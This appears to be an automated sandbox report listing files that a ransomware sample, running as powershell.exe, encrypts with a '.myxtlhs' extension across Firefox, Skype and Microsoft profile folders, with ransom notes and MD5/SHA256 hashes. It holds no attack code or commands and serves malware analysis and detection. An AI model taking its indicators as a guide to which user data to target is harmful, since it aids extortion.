SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite.myxtlhs
binary
MD5: 565026c4040ac8bfd231eb45ed87c872
SHA256: 837c33fde7286d18cc4fa98866e2d6413a074874f3c871b8f12067c2a1d709dd
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.myxtlhs
binary
MD5: f9ea709b44cd3d6cc6d96647a2bf4845
SHA256: ec3f6ce248665d9f50f63b9dbee05f5becdbc70d867306db16224729ba9c41ac
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite.myxtlhs
binary
MD5: cabeda999e04d061ca2d2224b9c2eced
SHA256: 256f04d99f89abefef60e6c94703dcfc506686cd7583408f0414d82dd79a460f
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\ECCD4BA46722CB4F92060701865DDF09D8AF68B4.myxtlhs
ini
MD5: 5f3bda944a80a4d554685f4f11f50d32
SHA256: 39d4950c82d3b91c4bc42d824e143aa90d10f7ddc5f4837169521adf520c7924
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70.myxtlhs
binary
MD5: de9ed0ce78c359dd6b0bfa34007745c7
SHA256: 3679ab53b34e82998ba7fae2c7209fb3a5d2f77877584ca6972bd7f4c8ea1948
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Access Parts\1033\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Access Parts\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\ECCD4BA46722CB4F92060701865DDF09D8AF68B4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Stationery\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\slimcore-0-4223384469.blog.myxtlhs
binary
MD5: 9a7732114fc1445b8b128dc5ec1a69f5
SHA256: 25a6899938f3fce526051fcf4fed51c44456efa6cf273468cbb9e725b38a7341
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\shared.xml.myxtlhs
binary
MD5: b4580d869c2455e97fe1a8c7f366f24f
SHA256: a767b6412a4bc81effded208aa956f746365293101d240e498563459bc81675c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Speech\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\shared.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\slimcore-0-4223384469.blog
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db-journal.myxtlhs
binary
MD5: a4347bdf14c17bd5d5df581e2589c493
SHA256: b42efb3338c4fec8d1ea21a6197c9511c155999deccadf250fd507399b3d00fb
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db.myxtlhs
binary
MD5: 7a65aa38f58da0129a417a030dce7266
SHA256: da719af1429158d56b07b0c4b3057470a55ab999785a7e772908878be112b4f8
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db-journal
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-wal.myxtlhs
binary
MD5: a1938b15a21b7bae6cef94c9f43655eb
SHA256: 86f66c695c23294180e65f279c8c9fa6306594318b49e9eaba87945ec590a52a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\config.xml.myxtlhs
binary
MD5: 7149ae8b3c597d22f0e043334ff827e9
SHA256: 24ebbedd35705c6f86d135da15d4bb5ab0a389547c2ebe63207f5b05fda3b4ac
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\config.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-wal
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-shm.myxtlhs
binary
MD5: 3da60b7c9138f2b4ffbb09b148132397
SHA256: dc686558165ae8a2e9e798f14b87851684947f0a8b55df645875165984d6939c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-shm
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data.myxtlhs
binary
MD5: d3b90e8c3077749dbb04989266a2cb56
SHA256: bcb305be3078451a11695f70c10269932892f388f50c2c600da37c19e52f339e
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.json.myxtlhs
binary
MD5: 87ec214d2faca7cee9fd8f429ef54e07
SHA256: b707591be06fdd78bd27b2b01893c14f46a642b46b956275960fa3dfdd8f2e65
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\QuotaManager.myxtlhs
vc
MD5: 9c6b4c42069efc2c8999f0ae4a0e3797
SHA256: 7b4d27c9c1827a13a99c806034e30912f80f1bd9538142153c81cae9b25b8692
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.bak.myxtlhs
binary
MD5: aa25a47cc2e24a2d078666450403c5f6
SHA256: bf35406fe203394bca5e3e5997f6115e0d284adcca03d19a763666a0b305e845
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Preferences.myxtlhs
binary
MD5: 60b42d23e70970f454ae5e2e11efe2e4
SHA256: 64e4e2566b2e99f62287b242405e0f2f4735a51297625ac7e4a5aa9d244a1562
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Preferences
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.bak
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\QuotaManager
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.myxtlhs
binary
MD5: d4a4e43ea1b6bd1a46bd3fbc525ea291
SHA256: f98470b3971fde0ed7cbad4014c27363ad1e2df663f83aa750de5a037ca68bb7
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-1-1870167131.blog.myxtlhs
binary
MD5: faa33b81006e2e607e936aa28a091cf4
SHA256: 2b0dbe4b2aefd4094b2b2e4b05b39f4e09a046675d3109fc0658bde770e7ede2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-1-1870167131.blog
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-0-2576771366.blog.myxtlhs
binary
MD5: 1f82023837eb0660465a3146343f09b5
SHA256: 4be7f51d805ff9b1a4d4bf2ac7d6ea37af8072c767a467c486f9ef1ef5efbf69
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\MANIFEST-000001.myxtlhs
binary
MD5: 97514751e625f856faf55cb53e6980ef
SHA256: 7e34f555de06eaa36ccb1bf79e5e07b454cc2c6694ee8ed132b86c0e1760f036
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\logs\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-0-2576771366.blog
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\MANIFEST-000001
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.old.myxtlhs
binary
MD5: d151c6caa0458ef5bd1d09164dc2a24e
SHA256: b5c292a87867410a5577c919583a2294686452a8af960a8e1578e00fd061369d
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.old
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.myxtlhs
binary
MD5: 139c0ca7009a477f4d7d35356d749774
SHA256: bf0394ab855afbd6695cd3eabd9b17f2fab69ed9059d348376f1d05ff56d4659
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\CURRENT.myxtlhs
binary
MD5: b820bb075cef345302d6f15292a057e1
SHA256: a6102b813e00ea76f5b2f4d840db457c1b8ddf391f185f5b9cd352cb38cfbd08
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\CURRENT
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000017.log.myxtlhs
binary
MD5: 3791270ec7f10cb58b6f0ad33f9b11da
SHA256: da730a6ac9488900b09221c1c5aeeb524ddec843307c9b12ddfa1aabcbfb979c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000018.ldb.myxtlhs
binary
MD5: 1ea178d46671a87488ba1243e2b8f123
SHA256: b61f7f7497c3620f5e67a5a091551c136afc3b1401998833b560b1fc265df3ce
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000018.ldb
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000017.log
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000005.ldb.myxtlhs
binary
MD5: b2f7ee2a248cc821c9ff8d8c689e8d20
SHA256: acb474336c57d07b00a4264b52812379c0c0d51f181fd79b56b36aab20a3c439
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000005.ldb
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\MANIFEST-000001.myxtlhs
binary
MD5: ac484f5277ef422f642269b9fd3098bb
SHA256: aad77a76bd25c2f3c5e05a0a4acfdff8a2120a56ecb89eb8954bd53dae4cb18a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.myxtlhs
binary
MD5: aa61703636f46e834581f627d8892343
SHA256: 44d9bf707729f391cb5319b81818b1690dcd73a9bb6bc60fbd9de53d29a4ecd2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.old.myxtlhs
binary
MD5: 10a4fc593c95b97ff73f3f6659c67228
SHA256: e330a10472f38a4b4a8153e38905fd8dd6eff691542f915e63fe5aecdfefd7ff
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\MANIFEST-000001
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.old
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\000003.log.myxtlhs
binary
MD5: 8288b88dad91bd59af0d9fe436e900a5
SHA256: 3437c169a77aa58f284f429d529787e72bea1249f29a90fd31ebc13c6e60b561
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\CURRENT.myxtlhs
binary
MD5: 2139ac23adc98a3bc94f1203eac57365
SHA256: 6128a8e7c3ed14d66babf221e5e90335946991e54ca8409ddfe9e822a6a18008
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\CURRENT
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\000003.log
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ecscache.json.myxtlhs
binary
MD5: f53a2172d5850896f24bde96a65e460d
SHA256: 324c9feb099acdc327a287088f3d0e1cbd0f7273948fa7c5d252e55d08528220
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\en-US.bdic.myxtlhs
binary
MD5: 2aaefc3dd531d602cc314ed6c9fa5f57
SHA256: f25a774d7cfaac91aef7030c074aaaa27fb20a5d5185cd6f9f2b9c3f39d2c1c9
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ecscache.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\en-US.bdic
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\Databases.db.myxtlhs
binary
MD5: d677a5968cae8d72243a291d9e98e3bc
SHA256: b596a190b51f7c20206bebe3e0035d0f519a28bc61f764a16667f44e8c1a32a2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\device-info.json.myxtlhs
binary
MD5: d9dcc8f679a0169762f96a248f012f74
SHA256: e8dcffa76ebdf3f8d1036424c90e2898d3fad6510fe537a9263d9b6dbcf496c4
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\Databases.db
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\device-info.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\index.myxtlhs
binary
MD5: a4b5f6e59bb84b72920f066df58788a7
SHA256: 3d62c6bb06d88bad580653c193852e0b6fe7537790207c8d0cb618972c5adb3c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cookies.myxtlhs
binary
MD5: d3d9d3f9108506cdbb82c3881eababd7
SHA256: da26d70e407ad597bd4801cc45cc02781c01530425a14efdbc342102efaa32ff
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cookies
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\index
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000004.myxtlhs
binary
MD5: 9b2b284d68c62ac772e9efe64728c542
SHA256: ab30d8835f770d052d8277380df507743ba61c9c8bab9da67154107f395a9046
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000004
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000001.myxtlhs
binary
MD5: 88d8a8aa2da030fed5f5bb52bc9d1f47
SHA256: 277fdc5e04d7164ef900cb2e4a41d2fb5093056dd4fd0dd4a0a0a59eb270d797
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000003.myxtlhs
binary
MD5: a7aa74c6ebfc4bd4c43c9d70e992a935
SHA256: ba1a2880ee3307899252c61f12aa2e9b7f7fe5ae7119a36eec1f5443c535cb0c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000002.myxtlhs
binary
MD5: f224442cc8908e32d3de35b31945d3fc
SHA256: 402cfd0fb6a0cac28f079a825fc1faad6cf2a8e5ba38453ebd80699b37d3fcc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000003
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000002
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000001
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_3
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_3.myxtlhs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_2.myxtlhs
binary
MD5: 79e0d5883496f10cd1d86c899a63bd05
SHA256: af2741971a64a11781aabc540c6e565500da78d29da7020e11f6ddc818ba9fbe
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_2
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_1.myxtlhs
flc
MD5: 4360e0714b17511c525f8ee12f8720c3
SHA256: 5db01832553ecc9955e2353b28257b529a8e9140d37cbbe5971c66d21ce35729
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_1
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_0.myxtlhs
binary
MD5: 35c63ee98c5f695e63657b014b5446f6
SHA256: 2266b928ba698f320fb5eb6714c0b60b2fc04cfdf949389211ea9ace79b6e9a8
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Signatures\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml.myxtlhs
binary
MD5: f5c742b2d7b213b9c2c3447b6a12622b
SHA256: 0dce53e26ef60e004e93d90b8324e891d0d43fee9e5af62cb9b41aa101ddc0ac
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_0
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
